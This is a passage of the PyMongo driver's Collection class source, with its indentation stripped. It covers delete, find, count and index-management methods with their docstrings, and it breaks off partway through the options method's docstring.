:Parameters:
- `filter`: A query that matches the document to delete.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
- An instance of :class:`~pymongo.results.DeleteResult`.
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Added the `collation` option.
.. versionadded:: 3.0
"""
write_concern = self._write_concern_for(session)
return DeleteResult(
self._delete_retryable(
filter, False,
write_concern=write_concern,
collation=collation, session=session),
write_concern.acknowledged)
def delete_many(self, filter, collation=None, session=None):
"""Delete one or more documents matching the filter.
>>> db.test.count_documents({'x': 1})
3
>>> result = db.test.delete_many({'x': 1})
>>> result.deleted_count
3
>>> db.test.count_documents({'x': 1})
0
:Parameters:
- `filter`: A query that matches the documents to delete.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
- An instance of :class:`~pymongo.results.DeleteResult`.
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Added the `collation` option.
.. versionadded:: 3.0
"""
write_concern = self._write_concern_for(session)
return DeleteResult(
self._delete_retryable(
filter, True,
write_concern=write_concern,
collation=collation, session=session),
write_concern.acknowledged)
def find_one(self, filter=None, *args, **kwargs):
"""Get a single document from the database.
All arguments to :meth:`find` are also valid arguments for
:meth:`find_one`, although any `limit` argument will be
ignored. Returns a single document, or ``None`` if no matching
document is found.
The :meth:`find_one` method obeys the :attr:`read_preference` of
this :class:`Collection`.
:Parameters:
- `filter` (optional): a dictionary specifying
the query to be performed OR any other type to be used as
the value for a query for ``"_id"``.
- `*args` (optional): any additional positional arguments
are the same as the arguments to :meth:`find`.
- `**kwargs` (optional): any additional keyword arguments
are the same as the arguments to :meth:`find`.
>>> collection.find_one(max_time_ms=100)
"""
if (filter is not None and not
isinstance(filter, abc.Mapping)):
filter = {"_id": filter}
cursor = self.find(filter, *args, **kwargs)
for result in cursor.limit(-1):
return result
return None
def find(self, *args, **kwargs):
"""Query the database.
The `filter` argument is a prototype document that all results
must match. For example:
>>> db.test.find({"hello": "world"})
only matches documents that have a key "hello" with value
"world". Matches can have other keys *in addition* to
"hello". The `projection` argument is used to specify a subset
of fields that should be included in the result documents. By
limiting results to a certain subset of fields you can cut
down on network traffic and decoding time.
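For example (the matching document shown here is hypothetical):
>>> for doc in db.test.find({'hello': 'world'}, projection={'_id': False}):
...     print(doc)
...
{u'hello': u'world'}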
Raises :class:`TypeError` if any of the arguments are of
improper type. Returns an instance of
:class:`~pymongo.cursor.Cursor` corresponding to this query.
The :meth:`find` method obeys the :attr:`read_preference` of
this :class:`Collection`.
:Parameters:
- `filter` (optional): a SON object specifying elements which
must be present for a document to be included in the
result set
- `projection` (optional): a list of field names that should be
returned in the result set or a dict specifying the fields
to include or exclude. If `projection` is a list "_id" will
always be returned. Use a dict to exclude fields from
the result (e.g. projection={'_id': False}).
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `skip` (optional): the number of documents to omit (from
the start of the result set) when returning the results
- `limit` (optional): the maximum number of results to
return
- `no_cursor_timeout` (optional): if False (the default), any
returned cursor is closed by the server after 10 minutes of
inactivity. If set to True, the returned cursor will never
time out on the server. Care should be taken to ensure that
cursors with no_cursor_timeout turned on are properly closed.
- `cursor_type` (optional): the type of cursor to return. The valid
options are defined by :class:`~pymongo.cursor.CursorType`:
- :attr:`~pymongo.cursor.CursorType.NON_TAILABLE` - the result of
this find call will return a standard cursor over the result set.
- :attr:`~pymongo.cursor.CursorType.TAILABLE` - the result of this
find call will be a tailable cursor - tailable cursors are only
for use with capped collections. They are not closed when the
last data is retrieved but are kept open and the cursor location
marks the final document position. If more data is received
iteration of the cursor will continue from the last document
received. For details, see the `tailable cursor documentation
<http://www.mongodb.org/display/DOCS/Tailable+Cursors>`_.
- :attr:`~pymongo.cursor.CursorType.TAILABLE_AWAIT` - the result
of this find call will be a tailable cursor with the await flag
set. The server will wait for a few seconds after returning the
full result set so that it can capture and return additional data
added during the query.
- :attr:`~pymongo.cursor.CursorType.EXHAUST` - the result of this
find call will be an exhaust cursor. MongoDB will stream batched
results to the client without waiting for the client to request
each batch, reducing latency. See notes on compatibility below.
- `sort` (optional): a list of (key, direction) pairs
specifying the sort order for this query. See
:meth:`~pymongo.cursor.Cursor.sort` for details.
- `allow_partial_results` (optional): if True, mongos will return
partial results if some shards are down instead of returning an
error.
- `oplog_replay` (optional): If True, set the oplogReplay query
flag.
- `batch_size` (optional): Limits the number of documents returned in
a single batch.
- `manipulate` (optional): **DEPRECATED** - If True (the default),
apply any outgoing SON manipulators before returning.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
- `return_key` (optional): If True, return only the index keys in
each document.
- `show_record_id` (optional): If True, adds a field ``$recordId`` in
each document with the storage engine's internal record identifier.
- `snapshot` (optional): **DEPRECATED** - If True, prevents the
cursor from returning a document more than once because of an
intervening write operation.
- `hint` (optional): An index, in the same format as passed to
:meth:`~pymongo.collection.Collection.create_index` (e.g.
``[('field', ASCENDING)]``). Pass this as an alternative to calling
:meth:`~pymongo.cursor.Cursor.hint` on the cursor to tell Mongo the
proper index to use for the query.
- `max_time_ms` (optional): Specifies a time limit for a query
operation. If the specified time is exceeded, the operation will be
aborted and :exc:`~pymongo.errors.ExecutionTimeout` is raised. Pass
this as an alternative to calling
:meth:`~pymongo.cursor.Cursor.max_time_ms` on the cursor.
- `max_scan` (optional): **DEPRECATED** - The maximum number of
documents to scan. Pass this as an alternative to calling
:meth:`~pymongo.cursor.Cursor.max_scan` on the cursor.
- `min` (optional): A list of field, limit pairs specifying the
inclusive lower bound for all keys of a specific index in order.
Pass this as an alternative to calling
:meth:`~pymongo.cursor.Cursor.min` on the cursor.
- `max` (optional): A list of field, limit pairs specifying the
exclusive upper bound for all keys of a specific index in order.
Pass this as an alternative to calling
:meth:`~pymongo.cursor.Cursor.max` on the cursor.
- `comment` (optional): A string or document. Pass this as an
alternative to calling :meth:`~pymongo.cursor.Cursor.comment` on the
cursor.
- `modifiers` (optional): **DEPRECATED** - A dict specifying
additional MongoDB query modifiers. Use the keyword arguments listed
above instead.
.. note:: There are a number of caveats to using
:attr:`~pymongo.cursor.CursorType.EXHAUST` as cursor_type:
- The `limit` option cannot be used with an exhaust cursor.
- Exhaust cursors are not supported by mongos and cannot be
used with a sharded cluster.
- A :class:`~pymongo.cursor.Cursor` instance created with the
:attr:`~pymongo.cursor.CursorType.EXHAUST` cursor_type requires an
exclusive :class:`~socket.socket` connection to MongoDB. If the
:class:`~pymongo.cursor.Cursor` is discarded without being
completely iterated the underlying :class:`~socket.socket`
connection will be closed and discarded without being returned to
the connection pool.
.. versionchanged:: 3.7
Deprecated the `snapshot` option, which is deprecated in MongoDB
3.6 and removed in MongoDB 4.0.
Deprecated the `max_scan` option. Support for this option is
deprecated in MongoDB 4.0. Use `max_time_ms` instead to limit server
side execution time.
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.5
Added the options `return_key`, `show_record_id`, `snapshot`,
`hint`, `max_time_ms`, `max_scan`, `min`, `max`, and `comment`.
Deprecated the option `modifiers`.
.. versionchanged:: 3.4
Support the `collation` option.
.. versionchanged:: 3.0
Changed the parameter names `spec`, `fields`, `timeout`, and
`partial` to `filter`, `projection`, `no_cursor_timeout`, and
`allow_partial_results` respectively.
Added the `cursor_type`, `oplog_replay`, and `modifiers` options.
Removed the `network_timeout`, `read_preference`, `tag_sets`,
`secondary_acceptable_latency_ms`, `max_scan`, `snapshot`,
`tailable`, `await_data`, `exhaust`, `as_class`, and `slave_okay`
parameters. Removed `compile_re` option: PyMongo now always
represents BSON regular expressions as :class:`~bson.regex.Regex`
objects. Use :meth:`~bson.regex.Regex.try_compile` to attempt to
convert from a BSON regular expression to a Python regular
expression object. Soft deprecated the `manipulate` option.
.. versionchanged:: 2.7
Added `compile_re` option. If set to False, PyMongo represented BSON
regular expressions as :class:`~bson.regex.Regex` objects instead of
attempting to compile BSON regular expressions as Python native
regular expressions, thus preventing errors for some incompatible
patterns, see `PYTHON-500`_.
.. versionadded:: 2.3
The `tag_sets` and `secondary_acceptable_latency_ms` parameters.
.. _PYTHON-500: https://jira.mongodb.org/browse/PYTHON-500
.. mongodoc:: find
"""
return Cursor(self, *args, **kwargs)
def find_raw_batches(self, *args, **kwargs):
"""Query the database and retrieve batches of raw BSON.
Similar to the :meth:`find` method but returns a
:class:`~pymongo.cursor.RawBatchCursor`.
This example demonstrates how to work with raw batches, but in practice
raw batches should be passed to an external library that can decode
BSON into another data type, rather than used with PyMongo's
:mod:`bson` module.
>>> import bson
>>> cursor = db.test.find_raw_batches()
>>> for batch in cursor:
... print(bson.decode_all(batch))
.. note:: find_raw_batches does not support sessions.
.. versionadded:: 3.6
"""
# OP_MSG with document-stream returns would be required to support
# sessions here.
if "session" in kwargs:
raise ConfigurationError(
"find_raw_batches does not support sessions")
return RawBatchCursor(self, *args, **kwargs)
def parallel_scan(self, num_cursors, session=None, **kwargs):
"""**DEPRECATED**: Scan this entire collection in parallel.
Returns a list of up to ``num_cursors`` cursors that can be iterated
concurrently. As long as the collection is not modified during
scanning, each document appears exactly once in one of the cursors'
result sets.
For example, to process each document in a collection using some
thread-safe ``process_document()`` function:
>>> def process_cursor(cursor):
... for document in cursor:
... # Some thread-safe processing function:
... process_document(document)
>>>
>>> # Get up to 4 cursors.
...
>>> cursors = collection.parallel_scan(4)
>>> threads = [
... threading.Thread(target=process_cursor, args=(cursor,))
... for cursor in cursors]
>>>
>>> for thread in threads:
... thread.start()
>>>
>>> for thread in threads:
... thread.join()
>>>
>>> # All documents have now been processed.
The :meth:`parallel_scan` method obeys the :attr:`read_preference` of
this :class:`Collection`.
:Parameters:
- `num_cursors`: the number of cursors to return
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs`: additional options for the parallelCollectionScan
command can be passed as keyword arguments.
.. note:: Requires server version **>= 2.5.5**.
.. versionchanged:: 3.7
Deprecated.
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Added back support for arbitrary keyword arguments. MongoDB 3.4
adds support for maxTimeMS as an option to the
parallelCollectionScan command.
.. versionchanged:: 3.0
Removed support for arbitrary keyword arguments, since
the parallelCollectionScan command has no optional arguments.
"""
warnings.warn("parallel_scan is deprecated. MongoDB 4.2 will remove "
"the parallelCollectionScan command.",
DeprecationWarning, stacklevel=2)
cmd = SON([('parallelCollectionScan', self.__name),
('numCursors', num_cursors)])
cmd.update(kwargs)
with self._socket_for_reads(session) as (sock_info, slave_ok):
# We call sock_info.command here directly, instead of
# calling self._command to avoid using an implicit session.
result = sock_info.command(
self.__database.name,
cmd,
slave_ok,
self._read_preference_for(session),
self.codec_options,
read_concern=self.read_concern,
parse_write_concern_error=True,
session=session,
client=self.__database.client)
cursors = []
for cursor in result['cursors']:
cursors.append(CommandCursor(
self, cursor['cursor'], sock_info.address,
session=session, explicit_session=session is not None))
return cursors
def _count(self, cmd, collation=None, session=None):
"""Internal count helper."""
with self._socket_for_reads(session) as (sock_info, slave_ok):
res = self._command(
sock_info,
cmd,
slave_ok,
allowable_errors=["ns missing"],
codec_options=self.__write_response_codec_options,
read_concern=self.read_concern,
collation=collation,
session=session)
if res.get("errmsg", "") == "ns missing":
return 0
return int(res["n"])
def _aggregate_one_result(
self, sock_info, slave_ok, cmd, collation=None, session=None):
"""Internal helper to run an aggregate that returns a single result."""
result = self._command(
sock_info,
cmd,
slave_ok,
codec_options=self.__write_response_codec_options,
read_concern=self.read_concern,
collation=collation,
session=session)
batch = result['cursor']['firstBatch']
return batch[0] if batch else None
def estimated_document_count(self, **kwargs):
"""Get an estimate of the number of documents in this collection using
collection metadata.
The :meth:`estimated_document_count` method is **not** supported in a
transaction.
All optional parameters should be passed as keyword arguments
to this method. Valid options include:
- `maxTimeMS` (int): The maximum amount of time to allow this
operation to run, in milliseconds.
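A minimal usage sketch (the count shown is hypothetical):
>>> db.test.estimated_document_count()
4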
:Parameters:
- `**kwargs` (optional): See list of options above.
.. versionadded:: 3.7
"""
if 'session' in kwargs:
raise ConfigurationError(
'estimated_document_count does not support sessions')
cmd = SON([('count', self.__name)])
cmd.update(kwargs)
return self._count(cmd)
def count_documents(self, filter, session=None, **kwargs):
"""Count the number of documents in this collection.
The :meth:`count_documents` method is supported in a transaction.
All optional parameters should be passed as keyword arguments
to this method. Valid options include:
- `skip` (int): The number of matching documents to skip before
returning results.
- `limit` (int): The maximum number of documents to count.
- `maxTimeMS` (int): The maximum amount of time to allow this
operation to run, in milliseconds.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
- `hint` (string or list of tuples): The index to use. Specify either
the index name as a string or the index specification as a list of
tuples (e.g. [('a', pymongo.ASCENDING), ('b', pymongo.ASCENDING)]).
This option is only supported on MongoDB 3.6 and above.
The :meth:`count_documents` method obeys the :attr:`read_preference` of
this :class:`Collection`.
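For example (the contents of ``db.test`` and the counts shown are
hypothetical):
>>> db.test.count_documents({'x': 1})
3
>>> db.test.count_documents({'x': 1}, skip=1)
2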
.. note:: When migrating from :meth:`count` to :meth:`count_documents`
the following query operators must be replaced:
+-------------+-------------------------------------+
| Operator | Replacement |
+=============+=====================================+
| $where | `$expr`_ |
+-------------+-------------------------------------+
| $near | `$geoWithin`_ with `$center`_ |
+-------------+-------------------------------------+
| $nearSphere | `$geoWithin`_ with `$centerSphere`_ |
+-------------+-------------------------------------+
$expr requires MongoDB 3.6+
:Parameters:
- `filter` (required): A query document that selects which documents
to count in the collection. Can be an empty document to count all
documents.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): See list of options above.
.. versionadded:: 3.7
.. _$expr: https://docs.mongodb.com/manual/reference/operator/query/expr/
.. _$geoWithin: https://docs.mongodb.com/manual/reference/operator/query/geoWithin/
.. _$center: https://docs.mongodb.com/manual/reference/operator/query/center/#op._S_center
.. _$centerSphere: https://docs.mongodb.com/manual/reference/operator/query/centerSphere/#op._S_centerSphere
"""
pipeline = [{'$match': filter}]
if 'skip' in kwargs:
pipeline.append({'$skip': kwargs.pop('skip')})
if 'limit' in kwargs:
pipeline.append({'$limit': kwargs.pop('limit')})
pipeline.append({'$group': {'_id': None, 'n': {'$sum': 1}}})
cmd = SON([('aggregate', self.__name),
('pipeline', pipeline),
('cursor', {})])
if "hint" in kwargs and not isinstance(kwargs["hint"], string_type):
kwargs["hint"] = helpers._index_document(kwargs["hint"])
collation = validate_collation_or_none(kwargs.pop('collation', None))
cmd.update(kwargs)
with self._socket_for_reads(session) as (sock_info, slave_ok):
result = self._aggregate_one_result(
sock_info, slave_ok, cmd, collation, session)
if not result:
return 0
return result['n']
def count(self, filter=None, session=None, **kwargs):
"""**DEPRECATED** - Get the number of documents in this collection.
The :meth:`count` method is deprecated and **not** supported in a
transaction. Please use :meth:`count_documents` or
:meth:`estimated_document_count` instead.
All optional count parameters should be passed as keyword arguments
to this method. Valid options include:
- `skip` (int): The number of matching documents to skip before
returning results.
- `limit` (int): The maximum number of documents to count.
- `maxTimeMS` (int): The maximum amount of time to allow the count
command to run, in milliseconds.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
- `hint` (string or list of tuples): The index to use. Specify either
the index name as a string or the index specification as a list of
tuples (e.g. [('a', pymongo.ASCENDING), ('b', pymongo.ASCENDING)]).
The :meth:`count` method obeys the :attr:`read_preference` of
this :class:`Collection`.
.. note:: When migrating from :meth:`count` to :meth:`count_documents`
the following query operators must be replaced:
+-------------+-------------------------------------+
| Operator | Replacement |
+=============+=====================================+
| $where | `$expr`_ |
+-------------+-------------------------------------+
| $near | `$geoWithin`_ with `$center`_ |
+-------------+-------------------------------------+
| $nearSphere | `$geoWithin`_ with `$centerSphere`_ |
+-------------+-------------------------------------+
$expr requires MongoDB 3.6+
:Parameters:
- `filter` (optional): A query document that selects which documents
to count in the collection.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): See list of options above.
.. versionchanged:: 3.7
Deprecated.
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Support the `collation` option.
.. _$expr: https://docs.mongodb.com/manual/reference/operator/query/expr/
.. _$geoWithin: https://docs.mongodb.com/manual/reference/operator/query/geoWithin/
.. _$center: https://docs.mongodb.com/manual/reference/operator/query/center/#op._S_center
.. _$centerSphere: https://docs.mongodb.com/manual/reference/operator/query/centerSphere/#op._S_centerSphere
"""
warnings.warn("count is deprecated. Use estimated_document_count or "
"count_documents instead. Please note that $where must "
"be replaced by $expr, $near must be replaced by "
"$geoWithin with $center, and $nearSphere must be "
"replaced by $geoWithin with $centerSphere",
DeprecationWarning, stacklevel=2)
cmd = SON([("count", self.__name)])
if filter is not None:
if "query" in kwargs:
raise ConfigurationError("can't pass both filter and query")
kwargs["query"] = filter
if "hint" in kwargs and not isinstance(kwargs["hint"], string_type):
kwargs["hint"] = helpers._index_document(kwargs["hint"])
collation = validate_collation_or_none(kwargs.pop('collation', None))
cmd.update(kwargs)
return self._count(cmd, collation, session)
def create_indexes(self, indexes, session=None, **kwargs):
"""Create one or more indexes on this collection.
>>> from pymongo import IndexModel, ASCENDING, DESCENDING
>>> index1 = IndexModel([("hello", DESCENDING),
... ("world", ASCENDING)], name="hello_world")
>>> index2 = IndexModel([("goodbye", DESCENDING)])
>>> db.test.create_indexes([index1, index2])
["hello_world", "goodbye_-1"]
:Parameters:
- `indexes`: A list of :class:`~pymongo.operations.IndexModel`
instances.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): optional arguments to the createIndexes
command (like maxTimeMS) can be passed as keyword arguments.
.. note:: `create_indexes` uses the `createIndexes`_ command
introduced in MongoDB **2.6** and cannot be used with earlier
versions.
.. note:: The :attr:`~pymongo.collection.Collection.write_concern` of
this collection is automatically applied to this operation when using
MongoDB >= 3.4.
.. versionchanged:: 3.6
Added ``session`` parameter. Added support for arbitrary keyword
arguments.
.. versionchanged:: 3.4
Apply this collection's write concern automatically to this operation
when connected to MongoDB >= 3.4.
.. versionadded:: 3.0
.. _createIndexes: https://docs.mongodb.com/manual/reference/command/createIndexes/
"""
common.validate_list('indexes', indexes)
names = []
with self._socket_for_writes() as sock_info:
supports_collations = sock_info.max_wire_version >= 5
def gen_indexes():
for index in indexes:
if not isinstance(index, IndexModel):
raise TypeError(
"%r is not an instance of "
"pymongo.operations.IndexModel" % (index,))
document = index.document
if "collation" in document and not supports_collations:
raise ConfigurationError(
"Must be connected to MongoDB "
"3.4+ to use collations.")
names.append(document["name"])
yield document
cmd = SON([('createIndexes', self.name),
('indexes', list(gen_indexes()))])
cmd.update(kwargs)
self._command(
sock_info, cmd, read_preference=ReadPreference.PRIMARY,
codec_options=_UNICODE_REPLACE_CODEC_OPTIONS,
write_concern=self._write_concern_for(session),
session=session)
return names
def __create_index(self, keys, index_options, session, **kwargs):
"""Internal create index helper.
:Parameters:
- `keys`: a list of tuples [(key, type), (key, type), ...]
- `index_options`: a dict of index options.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
"""
index_doc = helpers._index_document(keys)
index = {"key": index_doc}
collation = validate_collation_or_none(
index_options.pop('collation', None))
index.update(index_options)
with self._socket_for_writes() as sock_info:
if collation is not None:
if sock_info.max_wire_version < 5:
raise ConfigurationError(
'Must be connected to MongoDB 3.4+ to use collations.')
else:
index['collation'] = collation
cmd = SON([('createIndexes', self.name), ('indexes', [index])])
cmd.update(kwargs)
self._command(
sock_info, cmd, read_preference=ReadPreference.PRIMARY,
codec_options=_UNICODE_REPLACE_CODEC_OPTIONS,
write_concern=self._write_concern_for(session),
session=session)
def create_index(self, keys, session=None, **kwargs):
"""Creates an index on this collection.
Takes either a single key or a list of (key, direction) pairs.
The key(s) must be an instance of :class:`basestring`
(:class:`str` in Python 3), and the direction(s) must be one of
(:data:`~pymongo.ASCENDING`, :data:`~pymongo.DESCENDING`,
:data:`~pymongo.GEO2D`, :data:`~pymongo.GEOHAYSTACK`,
:data:`~pymongo.GEOSPHERE`, :data:`~pymongo.HASHED`,
:data:`~pymongo.TEXT`).
To create a single key ascending index on the key ``'mike'`` we just
use a string argument::
>>> my_collection.create_index("mike")
For a compound index on ``'mike'`` descending and ``'eliot'``
ascending we need to use a list of tuples::
>>> my_collection.create_index([("mike", pymongo.DESCENDING),
... ("eliot", pymongo.ASCENDING)])
All optional index creation parameters should be passed as
keyword arguments to this method. For example::
>>> my_collection.create_index([("mike", pymongo.DESCENDING)],
... background=True)
Valid options include, but are not limited to:
- `name`: custom name to use for this index - if none is
given, a name will be generated.
- `unique`: if ``True`` creates a uniqueness constraint on the index.
- `background`: if ``True`` this index should be created in the
background.
- `sparse`: if ``True``, omit from the index any documents that lack
the indexed field.
- `bucketSize`: for use with geoHaystack indexes.
Number of documents to group together within a certain proximity
to a given longitude and latitude.
- `min`: minimum value for keys in a :data:`~pymongo.GEO2D`
index.
- `max`: maximum value for keys in a :data:`~pymongo.GEO2D`
index.
- `expireAfterSeconds`: <int> Used to create an expiring (TTL)
collection. MongoDB will automatically delete documents from
this collection after <int> seconds. The indexed field must
be a UTC datetime or the data will not expire.
- `partialFilterExpression`: A document that specifies a filter for
a partial index.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
See the MongoDB documentation for a full list of supported options by
server version.
.. warning:: `dropDups` is not supported by MongoDB 3.0 or newer. The
option is silently ignored by the server and unique index builds
using the option will fail if a duplicate value is detected.
.. note:: `partialFilterExpression` requires server version **>= 3.2**
.. note:: The :attr:`~pymongo.collection.Collection.write_concern` of
this collection is automatically applied to this operation when using
MongoDB >= 3.4.
:Parameters:
- `keys`: a single key or a list of (key, direction)
pairs specifying the index to create
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): any additional index creation
options (see the above list) should be passed as keyword
arguments
.. versionchanged:: 3.6
Added ``session`` parameter. Added support for passing maxTimeMS
in kwargs.
.. versionchanged:: 3.4
Apply this collection's write concern automatically to this operation
when connected to MongoDB >= 3.4. Support the `collation` option.
.. versionchanged:: 3.2
Added partialFilterExpression to support partial indexes.
.. versionchanged:: 3.0
Renamed `key_or_list` to `keys`. Removed the `cache_for` option.
:meth:`create_index` no longer caches index names. Removed support
for the drop_dups and bucket_size aliases.
.. mongodoc:: indexes
"""
keys = helpers._index_list(keys)
name = kwargs.setdefault("name", helpers._gen_index_name(keys))
cmd_options = {}
if "maxTimeMS" in kwargs:
cmd_options["maxTimeMS"] = kwargs.pop("maxTimeMS")
self.__create_index(keys, kwargs, session, **cmd_options)
return name
def ensure_index(self, key_or_list, cache_for=300, **kwargs):
"""**DEPRECATED** - Ensures that an index exists on this collection.
.. versionchanged:: 3.0
**DEPRECATED**
"""
warnings.warn("ensure_index is deprecated. Use create_index instead.",
DeprecationWarning, stacklevel=2)
# The types supported by datetime.timedelta.
if not (isinstance(cache_for, integer_types) or
isinstance(cache_for, float)):
raise TypeError("cache_for must be an integer or float.")
if "drop_dups" in kwargs:
kwargs["dropDups"] = kwargs.pop("drop_dups")
if "bucket_size" in kwargs:
kwargs["bucketSize"] = kwargs.pop("bucket_size")
keys = helpers._index_list(key_or_list)
name = kwargs.setdefault("name", helpers._gen_index_name(keys))
# Note that there is a race condition here. One thread could
# check if the index is cached and be preempted before creating
# and caching the index. This means multiple threads attempting
# to create the same index concurrently could send the index
# to the server two or more times. This has no practical impact
# other than wasted round trips.
if not self.__database.client._cached(self.__database.name,
self.__name, name):
self.__create_index(keys, kwargs, session=None)
self.__database.client._cache_index(self.__database.name,
self.__name, name, cache_for)
return name
return None
def drop_indexes(self, session=None, **kwargs):
"""Drops all indexes on this collection.
Can be used on non-existent collections or collections with no indexes.
Raises OperationFailure on an error.
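For example, to drop every index except the required index on
``_id``:
>>> db.test.drop_indexes()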
:Parameters:
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): optional arguments to the dropIndexes
command (like maxTimeMS) can be passed as keyword arguments.
.. note:: The :attr:`~pymongo.collection.Collection.write_concern` of
this collection is automatically applied to this operation when using
MongoDB >= 3.4.
.. versionchanged:: 3.6
Added ``session`` parameter. Added support for arbitrary keyword
arguments.
.. versionchanged:: 3.4
Apply this collection's write concern automatically to this operation
when connected to MongoDB >= 3.4.
"""
self.__database.client._purge_index(self.__database.name, self.__name)
self.drop_index("*", session=session, **kwargs)
def drop_index(self, index_or_name, session=None, **kwargs):
"""Drops the specified index on this collection.
Can be used on non-existent collections or collections with no
indexes. Raises OperationFailure on an error (e.g. trying to
drop an index that does not exist). `index_or_name`
can be either an index name (as returned by `create_index`),
or an index specifier (as passed to `create_index`). An index
specifier should be a list of (key, direction) pairs. Raises
TypeError if index is not an instance of (str, unicode, list).
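For example, the ascending index created by
``db.test.create_index("mike")`` is named ``"mike_1"`` and can be
dropped by name:
>>> db.test.drop_index("mike_1")
or, equivalently, by specifier:
>>> db.test.drop_index([("mike", pymongo.ASCENDING)])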
.. warning::
if a custom name was used on index creation (by
passing the `name` parameter to :meth:`create_index` or
:meth:`ensure_index`) the index **must** be dropped by name.
:Parameters:
- `index_or_name`: index (or name of index) to drop
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): optional arguments to the dropIndexes
command (like maxTimeMS) can be passed as keyword arguments.
.. note:: The :attr:`~pymongo.collection.Collection.write_concern` of
this collection is automatically applied to this operation when using
MongoDB >= 3.4.
.. versionchanged:: 3.6
Added ``session`` parameter. Added support for arbitrary keyword
arguments.
.. versionchanged:: 3.4
Apply this collection's write concern automatically to this operation
when connected to MongoDB >= 3.4.
"""
name = index_or_name
if isinstance(index_or_name, list):
name = helpers._gen_index_name(index_or_name)
if not isinstance(name, string_type):
raise TypeError("index_or_name must be an index name or list")
self.__database.client._purge_index(
self.__database.name, self.__name, name)
cmd = SON([("dropIndexes", self.__name), ("index", name)])
cmd.update(kwargs)
with self._socket_for_writes() as sock_info:
self._command(sock_info,
cmd,
read_preference=ReadPreference.PRIMARY,
allowable_errors=["ns not found"],
write_concern=self._write_concern_for(session),
session=session)
def reindex(self, session=None, **kwargs):
"""Rebuilds all indexes on this collection.
:Parameters:
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): optional arguments to the reIndex
command (like maxTimeMS) can be passed as keyword arguments.
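A minimal sketch (the command's result document is returned):
>>> result = db.test.reindex()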
.. warning:: reindex blocks all other operations (indexes
are built in the foreground) and will be slow for large
collections.
.. versionchanged:: 3.6
Added ``session`` parameter. Added support for arbitrary keyword
arguments.
.. versionchanged:: 3.5
We no longer apply this collection's write concern to this operation.
MongoDB 3.4 silently ignored the write concern. MongoDB 3.6+ returns
an error if we include the write concern.
"""
cmd = SON([("reIndex", self.__name)])
cmd.update(kwargs)
with self._socket_for_writes() as sock_info:
return self._command(
sock_info, cmd, read_preference=ReadPreference.PRIMARY,
session=session)
def list_indexes(self, session=None):
"""Get a cursor over the index documents for this collection.
>>> for index in db.test.list_indexes():
... print(index)
...
SON([(u'v', 1), (u'key', SON([(u'_id', 1)])),
(u'name', u'_id_'), (u'ns', u'test.test')])
:Parameters:
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
An instance of :class:`~pymongo.command_cursor.CommandCursor`.
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionadded:: 3.0
"""
codec_options = CodecOptions(SON)
coll = self.with_options(codec_options=codec_options,
read_preference=ReadPreference.PRIMARY)
sock_ctx, read_pref = self._socket_for_primary_reads(session)
with sock_ctx as (sock_info, slave_ok):
cmd = SON([("listIndexes", self.__name), ("cursor", {})])
if sock_info.max_wire_version > 2:
with self.__database.client._tmp_session(session, False) as s:
try:
cursor = self._command(sock_info, cmd, slave_ok,
read_pref,
codec_options,
session=s)["cursor"]
except OperationFailure as exc:
# Ignore NamespaceNotFound errors to match the behavior
# of reading from *.system.indexes.
if exc.code != 26:
raise
cursor = {'id': 0, 'firstBatch': []}
return CommandCursor(coll, cursor, sock_info.address,
session=s,
explicit_session=session is not None)
else:
res = message._first_batch(
sock_info, self.__database.name, "system.indexes",
{"ns": self.__full_name}, 0, slave_ok, codec_options,
read_pref, cmd,
self.database.client._event_listeners)
cursor = res["cursor"]
# Note that a collection can only have 64 indexes, so there
# will never be a getMore call.
return CommandCursor(coll, cursor, sock_info.address)
def index_information(self, session=None):
"""Get information on this collection's indexes.
Returns a dictionary where the keys are index names (as
returned by create_index()) and the values are dictionaries
containing information about each index. The dictionary is
guaranteed to contain at least a single key, ``"key"`` which
is a list of (key, direction) pairs specifying the index (as
passed to create_index()). It will also contain any other
metadata about the indexes, except for the ``"ns"`` and
``"name"`` keys, which are cleaned. Example output might look
like this:
>>> db.test.create_index("x", unique=True)
u'x_1'
>>> db.test.index_information()
{u'_id_': {u'key': [(u'_id', 1)]},
u'x_1': {u'unique': True, u'key': [(u'x', 1)]}}
:Parameters:
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
.. versionchanged:: 3.6
Added ``session`` parameter.
"""
cursor = self.list_indexes(session=session)
info = {}
for index in cursor:
index["key"] = index["key"].items()
index = dict(index)
info[index.pop("name")] = index
return info
def options(self, session=None):
"""Get the options set on this collection.
Returns a dictionary of options and their values - see
:meth:`~pymongo.database.Database.create_collection` for more
information on the possible options. Returns an empty
dictionary if the collection has not been created yet.
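For example, for a capped collection created with
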